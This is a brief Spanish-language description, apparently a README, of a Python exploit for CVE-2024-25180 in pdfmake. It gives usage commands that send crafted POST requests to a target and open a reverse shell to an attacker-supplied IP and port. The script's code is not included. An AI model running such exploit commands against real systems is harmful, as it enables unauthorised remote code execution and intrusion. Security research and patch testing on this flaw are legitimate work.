
Script de exploit en Python para CVE-2024-25180, una vulnerabilidad de ejecución remota de código en pdfmake, que entrega una shell inversa mediante peticiones POST manipuladas.
pdfmake es un paquete de impresión PDF puro de JavaScript del lado del cliente/servidor. La versión afectada de este paquete es vulnerable a la inyección de código arbitrario, permitiendo a un atacante ejecutar código arbitrario enviando una solicitud POST diseñada a la ruta /pdf. Los atacantes pueden ejecutar código arbitrario en el sistema enviando una solicitud diseñada.
CVE-2024-25180 Remote Code Execution in pdfmake
python3 CVE-2024-25180.py <TARGET_IP> <TARGET_PORT> <LOCAL_IP> <LOCAL_PORT>
python3 CVE-2024-25180.py 192.168.140.42 1234 192.168.45.208 80
Escucha en el puerto 80 para obtener una shell inversa
